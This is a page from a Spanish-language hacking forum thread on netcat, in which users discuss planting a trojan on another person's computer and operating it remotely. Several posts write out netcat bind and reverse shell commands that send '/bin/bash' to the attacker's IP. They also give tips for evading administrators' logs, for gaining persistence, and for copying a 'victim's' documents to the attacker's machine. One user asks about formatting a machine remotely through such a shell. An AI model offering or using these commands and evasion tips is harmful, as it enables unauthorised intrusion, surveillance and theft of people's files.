elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Jugando con netcat
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 ... 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 [45] 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 ... 65 Ir Abajo Respuesta Imprimir
Autor Tema: Jugando con netcat  (Leído 378,805 veces)
D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #440 en: 16 Abril 2008, 14:59 pm »

Thylzos:
Eterm NO es un intérprete de comandos sino un emulador de terminal. lo que deberías ejecutar es el shell que deseas abrir, ya sea bash (/bin/bash), sh, csh, python, o cualquier shell o programa capáz de aceptar STDIN y STDOUT  ;D.
Si ejecutas Eterm, le saldrá eterm al usuario, y te quedarás con la salida de consola que son los errores, y toda la salida que eterm haga al STDOUT o STDERR fuera de su interfaz.
deberías usar "nc -l -vv -e /bin/bash -p 80" en la máquina ajena y "nc -vv IP 80" en la tuya o bien inversa haciendo "nc -vv -e /bin/bash TU_IP 80" en la máquina con Linux y "nc -vv -l -p 80" en la tuya.

El problema es que Linux no te permitirá usar un puerto privilegiado sin privilegios, asíque deberás conectar por uno como el 3000 o algo así. Otro problema es que TODAS las shells en Linux crean Logs a los que no podrás acceder, y eso significa que cualquier medianamente buen administrador se dará cuenta de tu presencia.
Otro tema es que sin privilegios de root no podrás hacer nada entretenido en el sistema (No es como Winbug$).

Para concluir, deberás conocer un poco del funcionamiento de Linux, y obtener privilegios, si deseas que esa shell se te conecte cada cierto tiempo, o cada inicio.

Lo mejor cuando te introduces en un sistema Linux así es usar un intérprete como csh cuyos logs no se suelen andar visando, a menos que uses un script o un programa como ACID Lab, en ese caso estás frito porque no solo se darán cuenta que estás, sino que a demás te sacarán el IP.
Jeje... te creiste que entrar en Linux era cosa de juego como entrar en Windoze? >:D

LinuX RuleZ!
En línea

OpenBSDFreeBSD
pascal88

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Jugando con netcat
« Respuesta #441 en: 16 Abril 2008, 20:12 pm »

Hola, me he leido todo el tutorial, pero aun asi consigo solucionar el problema que tengo, y es el siguiente:

Yo hago todo como dice desde el principio, todo igual, menos donde pone la ip de WHK, pues pongo la mia, la publica. Pues bien, luego cuando esta hecho el troyano, se lo paso a mi amigo, lo ejecuta, y pongo yo en ejecutar/cmd:

nc -vv -l -p 80  (intro)

y me sale una serie de cosas muy diferentes a lo que tenia que salir, es mas, me sale al principio la ip de WHK, la de 127.0.0.1, y yo no la puesto! que puedo hacer? otra de las veces me salio c:\windows>... pero era mi disco duro, porque registre y eran mis cosas!, que es lo que puedo hacer para acceder al disco duro de mi amigo??

Ni que decir tiene que mi amigo esta conforme, pues entre los dos estamos viendo esto.
En línea

D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #442 en: 17 Abril 2008, 01:02 am »

No te transformes en un s|{rIpt kiddi3, estudia, razona, despues haces las cosas.

127.0.0.1 es tu propia makina, es el host local, o localhost, la manera con la que tu máquina se refiere a ella misma, y es igual con WHK que con vos.
Para conectarte de la manera que vos pones en tu makina, el troyano debería ejecutar:

nc -vv TU_IP 80

y listo... Si se te corta la conexión ya hablamos de otro tema, por ejemplo un firewall o un antivirus.

Lee y aprende que eslo que estás haciendondo. Protocolo TCP/IP, Sockets, etcétera...
En línea

OpenBSDFreeBSD
pascal88

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Jugando con netcat
« Respuesta #443 en: 17 Abril 2008, 09:14 am »

Buenos dias, en primer lugar decir que mi anterior duda, ya esta resuelta mi pregunta ahora es la siguiente, ayer estuve hasta las tantas leyendo todos los post, quiza con el sueño no lo vi, pero no encuentro esto:

Una vez que yo entro y veo los titulos de las cosas que tiene la victima, puedo verlas? es decir, una vez que he visto que tiene un archivo word por ejemplo, puedo abrirlo para verlo yo? se que lo puedo abrir para que lo vea la victima, pero y verlo yo? se puede?
O puedo guardarlo en mi pc, para luego verlo yo cuando yo quiera? a que parte de jugando con Netcat pertenece esto?

Contestarme por favor, y si esta en el foro remitanme a la pagina adecuada, pues no la encuentro.

Muchisimas gracias! sois unos makinas!!


Joder, no veas lo que se aprende en este foro, antes ya aprendi sobre seguridad de redes inalambricas, y ahora esto, que me fascina aun mas.
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #444 en: 17 Abril 2008, 13:23 pm »

No, no es posible ver los documentos de la otra persona, porque tu estas conectado por consola, y para ver los demas documentos se utilizan programas externos...

Podrás verlos luego de habertelos pasado a tu pc  :P

Presta atención a este post  ;)

Saludos
« Última modificación: 17 Abril 2008, 15:41 pm por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #445 en: 19 Abril 2008, 05:53 am »

Si podes ver los documentos... :¬¬

Documentos de texto: Necesitarás instalarle remotamente un programa de lectura de consola tal como ViM, o nano... se que hay versiones para Windows. El mismo cmd debería redireccionartelo a tu consola, a través de la red. Por lo menos asi lo he logrado yo. Entonces editaras el texto desde tu máquina... para que no te lies, ViM funcionaría de la misma manera que la shell, es decir que se ejecuta en la máquina de él y la entrada y salida estándar se desvían a tu máquina, por lo que ViM advertirá que la entrada NO es de un Terminal...

Documentos de tipos binarios: Digo así porque, por ejemplo... un documento de tipo HTML, por ejemplo, no es TXT pero sí es de texto, en cambio uno de Word es binario, y no lograrás editarlo de ésta manera... en ese caso es obligatoria la transferencia, para editarlo en tu casita... Hay otros medios para editarlo pero requerirían que hagas un programa que automatice el trabajo con archivos de Word sin abrir Word, para lo que te puede servir AutoIt, pero es más sencillo transferirlo y editarlo, para luego reemplazarlo.

Es decir... habría manera de editar todo tipo de archivos desde la consola, como no si en Linux los hay, pero no te lies demasiado, te conviene transferir los binarios.
En línea

OpenBSDFreeBSD
Thylzos

Desconectado Desconectado

Mensajes: 147


Ver Perfil
Re: Jugando con netcat
« Respuesta #446 en: 19 Abril 2008, 12:17 pm »

Thylzos:
Eterm NO es un intérprete de comandos sino un emulador de terminal. lo que deberías ejecutar es el shell que deseas abrir, ya sea bash (/bin/bash), sh, csh, python, o cualquier shell o programa capáz de aceptar STDIN y STDOUT  ;D.
Si ejecutas Eterm, le saldrá eterm al usuario, y te quedarás con la salida de consola que son los errores, y toda la salida que eterm haga al STDOUT o STDERR fuera de su interfaz.
deberías usar "nc -l -vv -e /bin/bash -p 80" en la máquina ajena y "nc -vv IP 80" en la tuya o bien inversa haciendo "nc -vv -e /bin/bash TU_IP 80" en la máquina con Linux y "nc -vv -l -p 80" en la tuya.

El problema es que Linux no te permitirá usar un puerto privilegiado sin privilegios, asíque deberás conectar por uno como el 3000 o algo así. Otro problema es que TODAS las shells en Linux crean Logs a los que no podrás acceder, y eso significa que cualquier medianamente buen administrador se dará cuenta de tu presencia.
Otro tema es que sin privilegios de root no podrás hacer nada entretenido en el sistema (No es como Winbug$).

Para concluir, deberás conocer un poco del funcionamiento de Linux, y obtener privilegios, si deseas que esa shell se te conecte cada cierto tiempo, o cada inicio.

Lo mejor cuando te introduces en un sistema Linux así es usar un intérprete como csh cuyos logs no se suelen andar visando, a menos que uses un script o un programa como ACID Lab, en ese caso estás frito porque no solo se darán cuenta que estás, sino que a demás te sacarán el IP.
Jeje... te creiste que entrar en Linux era cosa de juego como entrar en Windoze? >:D

LinuX RuleZ!

Ni de lejos... lo que quería era configurar mi sistema para que pueda acceder remotamente :P. Gracias, ahora ya sé qué me deba el error ;).
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #447 en: 19 Abril 2008, 23:49 pm »

Citar
Si podes ver los documentos...

Si bien se puede, igualmente se esta utilizando un programa externo  :¬¬

Además pasa muchas veces, que cuando se intenta utilizar un programa externo desde cmd con netcat, este se queda colgado....
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
carlipus


Desconectado Desconectado

Mensajes: 358


Ver Perfil
Re: Jugando con netcat
« Respuesta #448 en: 20 Abril 2008, 14:20 pm »

Buenas, sabeis si obteniendo una shell con netcat se podria formatear el pc? no penseis mal !! jeje

Es que el pc de mi hermano necesita un formateo, y me gustaria hacerlo desde ms dos, y si puede ser, desde mi pc(obteniendo una shell con netcat, se podria)

Me gusta probrar cosas, pero antes decirme si se puede claro, jeje

Saludos
En línea

pascal88

Desconectado Desconectado

Mensajes: 22


Ver Perfil
Re: Jugando con netcat
« Respuesta #449 en: 21 Abril 2008, 00:49 am »

No, no es posible ver los documentos de la otra persona, porque tu estas conectado por consola, y para ver los demas documentos se utilizan programas externos...

Podrás verlos luego de habertelos pasado a tu pc  :P

Presta atención a este post  ;)

Saludos

De nuevo te doy las gracias, pero comentarte que no me ha servido, pues tan solo consigo con eso, pasarme los archivos a mi pc, pero en blanco, es decir, por ejemplo, la "victima" tiene un documento word en el escritorio llamado: pepito, yo consigo recibir, un archivo word llamado pepito, pero en blanco.
Que es lo que hago mal? como puedo pasarme el archivo y verlo??
En línea

Páginas: 1 ... 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 [45] 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 ... 65 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines